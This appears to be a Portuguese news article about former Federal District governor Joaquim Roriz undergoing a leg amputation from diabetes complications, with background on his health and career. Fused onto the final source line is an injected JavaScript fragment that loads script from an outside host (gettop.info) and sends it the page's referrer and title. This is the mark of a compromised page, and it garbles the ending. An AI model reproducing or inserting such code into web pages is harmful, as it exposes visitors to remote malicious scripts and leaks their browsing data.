Governador Rodrigo Rollemberg (esq.) cumprimenta Roriz durante missa de aniversário da deputada Liliane Roriz. Foto: Tony Winston/Agência Brasília (16/04/2015)
O ex-governador do DF Joaquim Roriz precisou amputar a perna na altura do joelho por causa do agravamento do diabetes. A amputação foi feita quarta-feira (30). A operação ocorre 11 dias depois de o político ficar sem dois dedos do pé esquerdo também devido a complicações provocadas pelo diabetes.
Ao portal Metrópoles, pessoas próximas ao ex-governador contaram que a nova amputação ocorreu ainda na noite de quarta. Roriz completou 81 anos no dia 4 de agosto. Luta, com o apoio da família, para controlar o avanço da doença. O ex-governador também é paciente renal crônico. Ele passa bem e a expectativa dos médicos é que receba uma prótese e tenha alta nos próximos dias.
Internação
A amputação dos dedos do pé ocorreu no sábado (19), no Hospital do Coração do Brasil. A operação foi necessária porque a doença compromete a circulação.
Em novembro de 2015, o ex-governador ficou quase uma semana internado após um quadro de hipertensão e taquicardia e precisou fazer um cateterismo, que não identificou nenhum problema de saúde além dos já conhecidos.
Em nota, a assessoria da deputada distrital Liliane Roriz (PTB), filha do ex-governador, confirmou que ele passou por um procedimento cirúrgico na noite de quarta, mas não deu detalhes da intervenção e pediu que “fosse respeitada a dor da família”.
O patriarca da família Roriz governou o DF por 14 anos. Em 2006, foi eleito senador. Iniciou o mandato em 2007 e renunciou cinco meses depois para escapar de um eventual processo de cassação devido ao escândalo da Bezerra de Ouro.
Fonte: Metrópoless.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;